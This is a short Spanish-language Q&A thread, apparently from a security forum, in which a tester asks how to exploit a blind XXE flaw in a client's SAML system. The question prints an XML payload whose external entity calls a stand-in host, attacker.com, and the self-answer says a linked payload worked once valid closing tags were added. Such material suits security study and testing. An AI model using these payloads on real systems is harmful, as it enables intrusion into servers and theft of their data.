alternativas de ruta de ataque para XXE

1

Así que encontré un ataque ciego de Entidad Externa Xml (XXE) contra una infraestructura SAML mientras estaba involucrado con un cliente, pero me ha dado muchos intentos al intentar explotarlo antes. Puedo construir un simple XXE:

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>

<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY % xxe SYSTEM "http://attacker.com/">%xxe;
]>
<xml></xml>

y obtengo la conexión http de su servidor, pero cualquier cosa más complicada, como buscarme una DTD y ejecutarla no tiene nada. Puedo ver el alcance de la DTD pero luego la solicitud de la DTD (una simple llamada a mi servidor) no se ejecuta. Así que, después de golpearme la cabeza contra una pared durante tres días, pensé que le preguntaría a la comunidad si tenían algún truco inteligente con XXE o alguna ruta de ataque cuando los ataques son limitados.

    
pregunta staticFlow 07.06.2018 - 02:38
fuente

1 respuesta

0

Como con cualquier cosa en este campo, ¡más investigación nunca duele!

Probé una carga útil encontrada aquí enlace que no funcionó originalmente, pero luego me di cuenta de que la implementación requería un xml válido real Etiquetas al final que los ejemplos no tenían!

    
respondido por el staticFlow 07.06.2018 - 03:52
fuente

Lea otras preguntas en las etiquetas